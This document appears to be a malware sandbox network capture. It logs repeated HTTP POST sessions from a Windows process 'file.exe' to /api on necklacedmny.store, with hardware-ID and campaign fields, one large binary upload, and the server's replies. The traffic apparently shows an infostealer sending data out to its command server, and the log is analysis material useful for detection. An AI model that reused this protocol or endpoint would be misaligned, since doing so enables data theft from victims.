                                                                            2024-10-31 19:49:02 UTC284OUTPOST /api HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                            Content-Length: 15110
                                                                            Host: necklacedmny.store
                                                                            2024-10-31 19:49:02 UTC15110OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 32 44 38 37 32 36 36 32 36 34 39 41 44 34 31 32 39 45 32 39 34 39 38 33 30 37 34 44 37 30 42 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e
                                                                            Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"F2D872662649AD4129E294983074D70B--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen
                                                                            2024-10-31 19:49:03 UTC1018INHTTP/1.1 200 OK
                                                                            Date: Thu, 31 Oct 2024 19:49:03 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Set-Cookie: PHPSESSID=21eomnuvbhjiriie9hs650lf7c; expires=Mon, 24-Feb-2025 13:35:42 GMT; Max-Age=9999999; path=/
                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                            Pragma: no-cache
                                                                            cf-cache-status: DYNAMIC
                                                                            vary: accept-encoding
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=R5mTqD0pgDpuQJv6MLxw9IfKPBudscHW5FLOwtF0F9YNBxMZjOn%2BAXwWY1%2BQ8KwxVWywOexrEfXP%2Fj7ttwJL7Zgm0w9cTbEiRYFwv1Tv61WV010hqxXItuJTGL1SO1WXUa%2BXRX0%3D"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8db62a850ce8e956-DFW
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1169&sent=8&recv=20&lost=0&retrans=0&sent_bytes=2845&recv_bytes=16052&delivery_rate=2343042&cwnd=242&unsent_bytes=0&cid=0cf9bf6f6556182b&ts=548&x=0"
                                                                            2024-10-31 19:49:03 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 37 0d 0a
                                                                            Data Ascii: 11ok 173.254.250.77
                                                                            2024-10-31 19:49:03 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                            Data Ascii: 0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            4192.168.2.649715188.114.97.34432136C:\Users\user\Desktop\file.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-31 19:49:04 UTC284OUTPOST /api HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                            Content-Length: 19968
                                                                            Host: necklacedmny.store
                                                                            2024-10-31 19:49:04 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 32 44 38 37 32 36 36 32 36 34 39 41 44 34 31 32 39 45 32 39 34 39 38 33 30 37 34 44 37 30 42 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e
                                                                            Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"F2D872662649AD4129E294983074D70B--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen
                                                                            2024-10-31 19:49:04 UTC4637OUTData Raw: f0 03 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8b 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 b1 e8 ef fa 6f c5 82 3f 0c fe 4d 70 35 98 09 ee b9 f1 d3 1b 7f 70
                                                                            Data Ascii: +?2+?2+?o?Mp5p
                                                                            2024-10-31 19:49:04 UTC1013INHTTP/1.1 200 OK
                                                                            Date: Thu, 31 Oct 2024 19:49:04 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Set-Cookie: PHPSESSID=q0i0t2mp94f6qlq830lo8doqtb; expires=Mon, 24-Feb-2025 13:35:43 GMT; Max-Age=9999999; path=/
                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                            Pragma: no-cache
                                                                            cf-cache-status: DYNAMIC
                                                                            vary: accept-encoding
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fPldkir6Revu0w7NsQLwFY5n9PuFhNXbi7HsFek7KjcCtZ1Io9Xx%2FIzh5KIZeWqnHSMylnz2ABsboScjIb8A2Zpke3imd6UJPSMr4GYJDV3Cf51ePKEtibyBAypQIHZ5x6JyeL4%3D"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8db62a8dbbff6b17-DFW
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1037&sent=11&recv=25&lost=0&retrans=0&sent_bytes=2846&recv_bytes=20932&delivery_rate=2844793&cwnd=250&unsent_bytes=0&cid=01d980b75dfd1678&ts=668&x=0"
                                                                            2024-10-31 19:49:04 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 37 0d 0a
                                                                            Data Ascii: 11ok 173.254.250.77


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            5192.168.2.649716188.114.97.34432136C:\Users\user\Desktop\file.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-31 19:49:06 UTC283OUTPOST /api HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                            Content-Length: 1219
                                                                            Host: necklacedmny.store
                                                                            2024-10-31 19:49:06 UTC1219OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 32 44 38 37 32 36 36 32 36 34 39 41 44 34 31 32 39 45 32 39 34 39 38 33 30 37 34 44 37 30 42 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e
                                                                            Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"F2D872662649AD4129E294983074D70B--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen
                                                                            2024-10-31 19:49:06 UTC1024INHTTP/1.1 200 OK
                                                                            Date: Thu, 31 Oct 2024 19:49:06 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Set-Cookie: PHPSESSID=th1pda54b3hh18it8agr7nt6uj; expires=Mon, 24-Feb-2025 13:35:45 GMT; Max-Age=9999999; path=/
                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                            Pragma: no-cache
                                                                            cf-cache-status: DYNAMIC
                                                                            vary: accept-encoding
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iLyO508Q21FSRkTM5Hd3ZPmgv9JBDoaUIjOTdCmCSuv%2F%2BEEKN1EAk2Yql%2BateVo3%2FJWaXK%2FOKTnomaNms6KDhqFrnoqgaFSXG4iZxN%2F6lIP5Hr4Rw5%2BXiwGsrdXOqGoCF%2FvaNIs%3D"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8db62a98fe2f2fd8-DFW
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1171&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2846&recv_bytes=2138&delivery_rate=2333601&cwnd=251&unsent_bytes=0&cid=59e30f91c1eb8c85&ts=522&x=0"
                                                                            2024-10-31 19:49:06 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 37 0d 0a
                                                                            Data Ascii: 11ok 173.254.250.77
                                                                            2024-10-31 19:49:06 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                            Data Ascii: 0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            6192.168.2.649727188.114.97.34432136C:\Users\user\Desktop\file.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-31 19:49:07 UTC285OUTPOST /api HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                            Content-Length: 568808
                                                                            Host: necklacedmny.store
                                                                            2024-10-31 19:49:07 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 32 44 38 37 32 36 36 32 36 34 39 41 44 34 31 32 39 45 32 39 34 39 38 33 30 37 34 44 37 30 42 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e
                                                                            Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"F2D872662649AD4129E294983074D70B--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen
                                                                            2024-10-31 19:49:07 UTC15331OUTData Raw: e3 4d 1f 7d 90 ef d7 ad a5 bf 17 d4 05 64 7c db f7 b5 5b 0d c0 d3 98 13 e0 4d e2 4c c0 f2 35 7e 0b 0f 13 9a e0 26 e2 0d 69 a6 56 bb 3b c2 74 3f e4 6a 44 b9 09 fa 57 ff 10 e6 e0 b7 03 49 93 7f 48 f2 ae ac a4 78 27 69 83 69 f0 ec 48 32 d1 da 01 de 27 2a f3 8b 12 0f 88 ea 8c 50 ee 48 84 36 ba a5 a3 57 c3 15 32 93 04 37 db 52 95 25 71 3e e9 67 f0 96 16 4f 5a 81 a0 3a c3 c3 8b e4 ac d0 6c 8c 67 81 ef 91 be ad 68 2a ac f3 5f 48 11 06 33 f9 39 5a 46 5f bc 33 92 18 13 8d d0 fc 44 0a ca a8 05 f7 c3 d5 b6 3d 87 5c a4 08 fe 5a b1 91 8b de af 2b d0 74 29 94 9f 4d 4e 18 be 29 32 14 59 d1 83 aa b6 1d b4 c9 ae b4 e7 6b 19 97 37 93 5b 7d 8e 26 66 46 18 6f 96 ef db 23 73 bf 7c 0b 79 6f e3 53 dd 67 a9 b1 be 09 fc 3b 70 37 d5 b3 50 94 aa 17 79 c4 c5 d1 1f 67 cf 2e bb 6e a8
                                                                            Data Ascii: M}d|[ML5~&iV;t?jDWIHx'iiH2'*PH6W27R%q>gOZ:lgh*_H39ZF_3D=\Z+t)MN)2Yk7[}&fFo#s|yoSg;p7Pyg.n
                                                                            2024-10-31 19:49:07 UTC15331OUTData Raw: b4 b7 48 01 a5 ce a4 31 b4 eb e7 61 49 8a 9d e4 d6 4f 93 32 e8 5f 2b 13 f1 c4 7e 6e f3 3f 22 66 54 c3 e5 24 2f d3 fc f3 94 8d dc bc d0 ba 9a 9c 9b 03 c2 3d 89 80 bf f9 bf 4f 8b 35 c3 c5 9f 15 e8 3d 62 01 ab 43 22 65 95 ac 8a e6 a1 a0 c9 74 96 ab 08 67 d0 58 d7 b3 c2 ae 2c f0 5a 07 58 48 dc 0a 9f 09 d7 fb 29 19 f0 f1 c7 7c a5 80 c6 07 4d b8 46 23 6c fe 00 fb ce 7c c8 ce d0 f8 d8 33 94 f0 f7 b9 76 01 0d 1f b7 56 19 c3 ff fd 12 32 75 fc fe 62 3d 83 52 19 f6 da ee 0d c7 62 9b 55 a3 93 12 ec 30 17 ce 9e f1 c7 7a bf df 4c 08 18 6c 73 d5 f0 0b 30 3a d8 ac e6 54 3d f8 ab 77 f1 94 38 22 b0 5a b4 bd 86 2a fc bd 3a 66 ed 06 97 1f 0f df 4c ba b1 0f c5 68 ba 10 6c bd 79 44 44 cc 6b 85 f6 d7 97 c7 8e 8a e4 a1 0f 9e 53 d1 6d 8f df ec 40 51 79 0e e2 de 7b 0e 37 ea 88 7b
                                                                            Data Ascii: H1aIO2_+~n?"fT$/=O5=bC"etgX,ZXH)|MF#l|3vV2ub=RbU0zLls0:T=w8"Z*:fLhlyDDkSm@Qy{7{
                                                                            2024-10-31 19:49:07 UTC15331OUTData Raw: d8 87 d6 97 8a 4b 53 ce 4d 84 42 21 5f 8e 97 84 7d 5a cc 5d a5 2c 7f e4 cd d3 d0 37 a5 9f dd 31 b2 6f d2 ed 40 6c c5 3a 33 4f 47 b8 89 a6 d4 f3 9f 91 72 8b 7c a4 3a 5e 90 71 e4 ac 73 54 88 d4 56 bf 51 1c f0 6c d1 ec 80 2d da 1b 9b ea 66 f2 90 83 2f b6 98 10 db 64 c9 21 97 22 93 33 6f fb 4d a1 af 96 f4 ea 70 c5 b6 0e b0 dc b6 35 e8 3c 77 e2 ff 9d d5 1d fe b7 f8 30 2d b1 97 79 bc 47 ff eb d6 94 84 0e 52 f7 19 4b 9b 9b e4 a7 44 e0 7d 7e 47 f9 97 51 c2 d4 61 7c 2b b6 c5 9d 0f 7e 5a 4b 2c 6f 9b 44 bc 41 12 20 92 31 dc 03 8f f8 5b 70 2d 4a 02 7b b0 2e d7 9d 47 ec f3 b8 55 a9 a5 63 e3 97 4a 5b 0e 92 f5 f4 d8 81 bf 3a ac e8 88 e8 eb 13 d7 15 c8 3f 3b 56 62 27 ce 52 8c 67 8a c6 0d 5c 7f 82 8b 63 c7 fb 18 1b 5a 9b a1 bc 89 63 4a d4 d1 c0 84 37 e3 19 df 94 fa 1d aa
                                                                            Data Ascii: KSMB!_}Z],71o@l:3OGr|:^qsTVQl-f/d!"3oMp5<w0-yGRKD}~GQa|+~ZK,oDA 1[p-J{.GUcJ[:?;Vb'Rg\cZcJ7
                                                                            2024-10-31 19:49:07 UTC15331OUTData Raw: 89 b1 94 b1 c4 ea f9 34 69 69 9c 88 11 55 7d 17 d4 f9 ed e1 ed e3 89 2c 61 66 c7 7f 18 a2 28 6d b0 fd 44 99 b3 02 6f c0 ff ef 0a df 19 6b 22 04 b3 45 e0 49 b0 da 83 70 43 19 60 df 05 1f 7a 5f 59 70 e8 9f 89 02 75 e4 98 20 75 97 64 3b fb e9 b9 c4 5b e3 94 40 50 d8 0c 9b e6 c7 1d ee 9b a7 73 97 7e e8 47 40 6b 90 53 24 13 59 78 b8 0b 73 da 3e 97 81 aa 4d 6f 78 78 81 75 29 0e a3 cd 39 85 ce 3d 4b 7b 0d 59 cb d9 8f ee 12 98 81 75 67 53 9c ba f4 8d a7 64 23 c9 57 a4 b5 4b 27 a9 16 5f 33 d2 b8 4d b2 a1 3d fd ee 2e 84 f4 15 11 22 06 f2 75 c1 7f 59 38 b8 89 0e 42 5b b8 75 a5 0a 4a 29 25 b7 fe 94 73 ef 35 26 93 1a 3a 45 ec e0 27 f3 0f 94 b8 cd 27 6b b3 32 0d 81 87 3b cf cd ed db 7b cf c5 d1 bb 6a 7b 9f bd 80 d6 fb a9 4c 0b 30 fd d0 54 f3 95 46 54 84 97 48 8f 29 06
                                                                            Data Ascii: 4iiU},af(mDok"EIpC`z_Ypu ud;[@Ps~G@kS$Yxs>Moxxu)9=K{YugSd#WK'_3M=."uY8B[uJ)%s5&:E''k2;{j{L0TFTH)
                                                                            2024-10-31 19:49:07 UTC15331OUTData Raw: fd aa 19 83 27 ae 51 fd da 86 da 0c 19 3b a6 dd 1a 70 ad 39 b6 66 b8 e5 bf 0d 32 02 31 57 45 dc 75 06 c4 5a 0b 22 46 8f e9 af dd d2 5b 33 fb 97 b9 8d a3 7d 03 d4 fd c2 8d e5 5c a0 48 83 f1 04 2a cd e4 7e 64 f7 3b 86 b1 58 32 28 14 da 75 9f 2d 14 d0 f2 62 a1 e5 3d a1 99 44 0b dc ac 08 7c 71 b0 55 c8 14 ba b6 f5 5c a3 6e 9f e7 d3 59 1f 51 86 0b 6f 83 ae 89 65 c2 b0 2d ea b7 c6 47 07 df 9c cd d0 03 d3 d2 29 72 a8 8b 7e f6 98 6c 61 52 3e f5 8c 11 91 dc 22 8c 3f 33 a3 9a c1 46 7d dc c8 13 a3 0e 43 aa 6e 35 f2 52 f5 95 a8 0a fb 8f 6f 97 6b 70 1f d4 0a 3d ce 52 32 54 ef c7 15 d2 3e 5a 5a 06 8a 7f dd de 10 12 a1 af d5 14 6a 52 9d 04 df f6 5f 0b b8 9f 61 8c 7a e7 c8 14 84 3f 3c c9 0c 01 3a 18 d2 eb 57 f6 a7 a3 4a 9b a2 56 12 50 88 40 f7 16 2e 5b e0 cb ae 7f 9b 27
                                                                            Data Ascii: 'Q;p9f21WEuZ"F[3}\H*~d;X2(u-b=D|qU\nYQoe-G)r~laR>"?3F}Cn5Rokp=R2T>ZZjR_az?<:WJVP@.['
                                                                            2024-10-31 19:49:07 UTC15331OUTData Raw: 1e 98 0f 19 14 2a 1b de 3d 8a 05 39 92 40 bf ea 38 b4 79 8e f2 b5 44 b2 8c 83 c7 8a 65 4a 57 1b 16 09 79 93 b7 53 a6 fb ee d9 6d 77 87 20 61 ec 51 8a 04 9a 66 be 93 55 18 a8 89 0a ef 2f 01 26 6f 33 60 6a 17 e1 c8 c3 20 ba d4 a0 cb ae ad 79 6c 2a 11 bd b0 95 95 b5 4b 27 cb 59 19 4f 6a 46 95 e8 81 fd 48 77 60 89 8f 11 68 3f d7 4f 66 5c d7 d0 5b 6f 31 5e 9b bf 69 f6 e5 e2 fa e0 07 b6 d8 f0 0a e0 cb 8f 7e 5e 97 d9 01 17 06 05 35 7e fa 2c c7 0c 9a 46 c4 9e bc b0 e8 c1 f8 e3 48 78 a5 bf aa 0f a6 48 00 c3 4b 0d 9c ae 53 46 c5 a6 45 68 00 bf 42 1d a1 30 5f a8 07 45 36 55 53 36 dd 19 9b 98 80 9f 48 a0 a9 88 9b bf aa 14 76 42 ca ef bc 57 b1 f6 b4 b0 50 e9 46 ca 40 cd e3 d4 85 14 86 55 7a ac d3 35 d6 5c 5e a2 9c a3 8a 1a cb c9 4a 3c fe 7e e4 ec 49 77 a8 76 2e a7 ed
                                                                            Data Ascii: *=9@8yDeJWySmw aQfU/&o3`j yl*K'YOjFHw`h?Of\[o1^i~^5~,FHxHKSFEhB0_E6US6HvBWPF@Uz5\^J<~Iwv.
                                                                            2024-10-31 19:49:07 UTC15331OUTData Raw: e9 cf c4 fd 78 52 6d c3 1e eb 32 64 38 1f fb 1c c4 b0 44 22 78 42 cf 48 0d 73 ed e5 2d 7f f8 00 c4 38 9f 50 9f de 1c e3 e3 e4 00 91 d4 16 0e 00 2d 53 77 aa eb 3e 50 bc 7b fc a7 8d 44 f4 fb 9b 9b 65 f7 51 da b0 02 6d 6e 1e 1a 7a d9 d5 58 b5 e3 c0 f7 0d 03 7e 67 3c a6 12 95 d6 67 33 7f 09 12 f5 b9 68 e0 d7 75 9e 14 88 b8 3e 8a 9a 84 ae ef b2 fe 4f 63 8a 35 ab ce d0 b2 b3 c5 1c e1 13 97 7b 27 7d 24 6b 24 eb 48 82 ec 55 53 9e 1b 4c 40 fa 5b e2 d3 ef cc e0 9a 0c 9c 23 a3 68 01 eb 22 13 d7 10 d2 93 86 58 2d 7d 0c b6 c6 28 96 27 f3 53 9f ee ca 6b a7 8b cf 7d 9f d5 67 9d 72 6f 68 de b1 bf bf 23 49 b2 95 a7 8a 33 15 81 62 53 aa e6 24 62 3f d8 bd 7b 77 ab 9d 7d 66 e1 cb ab ec 69 13 43 e0 77 52 3f b5 91 51 6d a3 d1 40 a5 a8 8b 28 21 8e 43 c4 0a 00 81 69 8e 1d 84 f8
                                                                            Data Ascii: xRm2d8D"xBHs-8P-Sw>P{DeQmnzX~g<g3hu>Oc5{'}$k$HUSL@[#h"X-}('Sk}groh#I3bS$b?{w}fiCwR?Qm@(!Ci
                                                                            2024-10-31 19:49:07 UTC15331OUTData Raw: ce a4 df a1 ff 0f 93 3d 03 91 f6 e1 fe ff cd 06 72 79 dc 5e 18 6a c1 82 93 a6 ec 81 12 9e be 26 86 b4 49 7a b7 8d d7 0b 5c f4 74 33 d5 4e de a3 8c a3 e2 3f 1f 81 e1 d4 65 ee aa 39 b9 d7 e1 e3 4e 74 fa 3a c1 c5 11 08 c1 07 ae 15 db dd 31 b3 5b bf 64 9f 2a 65 41 91 7f 8c 37 c4 b8 a5 cd dd 02 c5 46 20 af f8 86 15 8c 7a 0e 9f ec 45 a5 f4 f5 dc 4f bd 21 80 b6 06 fa e7 d1 bd c2 e0 3a 5b 4f 02 e2 5b b5 58 95 c2 e0 3b ff ec 8b 6c 9d 4e c1 00 9d 6f 02 c9 31 2a 4e 94 6e a1 d4 fd 90 12 3b 47 1d bc 90 c5 5d 92 4b 15 61 3e 1a e8 b0 8c 9c 37 6d 30 85 11 2d 69 e3 77 8e c2 c9 12 e0 bd 30 63 57 aa 46 2c 0b a8 2b 04 52 c4 21 7c b7 5f e6 52 12 8c 2d ab 3f 43 3b 0c 56 c9 89 a7 49 e6 84 c1 9c 63 b6 b6 47 18 28 21 71 72 b2 17 06 c6 0f 8f 61 57 c3 9a 0e 28 d7 21 28 51 34 6a 68
                                                                            Data Ascii: =ry^j&Iz\t3N?e9Nt:1[d*eA7F zEO!:[O[X;lNo1*Nn;G]Ka>7m0-iw0cWF,+R!|_R-?C;VIcG(!qraW(!(Q4jh
                                                                            2024-10-31 19:49:07 UTC15331OUTData Raw: 80 8e 9b f7 72 6a 88 71 e8 17 fb 5e ae 4c 38 dc df ae 70 0e 13 26 95 ff 38 2c df 16 13 04 f0 05 3d 42 9f 4e 49 5e 58 0d ea f7 fc ba e0 96 ea c0 51 48 29 1f a5 f9 ba 3b b9 c4 8f 85 fe 5e c7 f7 4d d2 74 3b 52 97 47 be 3e 4a 0f ec b6 e1 0c 94 6e 70 15 c6 42 b5 1a 4a 07 39 81 82 a8 21 4c 70 6e 0c ba 8a 54 d3 53 90 fe 6d a4 c6 86 fd 68 e3 9b 09 7b 07 37 85 16 1a b0 2e f6 d4 87 17 b8 94 ed f7 47 57 fa 85 07 b1 22 15 4a 75 3a 53 b6 a9 33 34 f0 92 14 41 b0 a8 3c 3f 1a bd 0f 17 9c f3 6f a5 27 02 4d 7f 28 74 27 1e ae 32 b8 5e be 4b c4 34 5c 2d a3 f3 0c f6 9c 93 f9 7b 59 8f 3f 2a e6 6a 25 bf 9c 43 d7 2e b2 da ac 34 4a 25 9d 03 aa 8d 58 7d de b3 74 bc fc 37 45 a6 7f ba b4 16 98 56 1b 36 28 26 cc 9f e2 e4 72 da ef b8 ef 10 00 d6 ac bd f7 fc 40 fe 2c ab b0 cd 4f 08 95
                                                                            Data Ascii: rjq^L8p&8,=BNI^XQH);^Mt;RG>JnpBJ9!LpnTSmh{7.GW"Ju:S34A<?o'M(t'2^K4\-{Y?*j%C.4J%X}t7EV6(&r@,O
                                                                            2024-10-31 19:49:09 UTC1019INHTTP/1.1 200 OK
                                                                            Date: Thu, 31 Oct 2024 19:49:09 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Set-Cookie: PHPSESSID=j61d80fhs9ld440564fm3qh3s6; expires=Mon, 24-Feb-2025 13:35:48 GMT; Max-Age=9999999; path=/
                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                            Pragma: no-cache
                                                                            cf-cache-status: DYNAMIC
                                                                            vary: accept-encoding
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=h4ldqdUvK9bqdpQIvKGyFbLwPJ9HXF62HU3k%2BkpzoIrgHS3L9DHiTXHhUDXLGhnYxNwquQprO2lPdCYgA1x65uv0Tm2ckRR7mifqwGzUH15P7baFq%2FDNn3IZhNhnRkwNLFgSG1Y%3D"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8db62aa34bcbe853-DFW
                                                                            alt-svc: h3=":443"; ma=86400
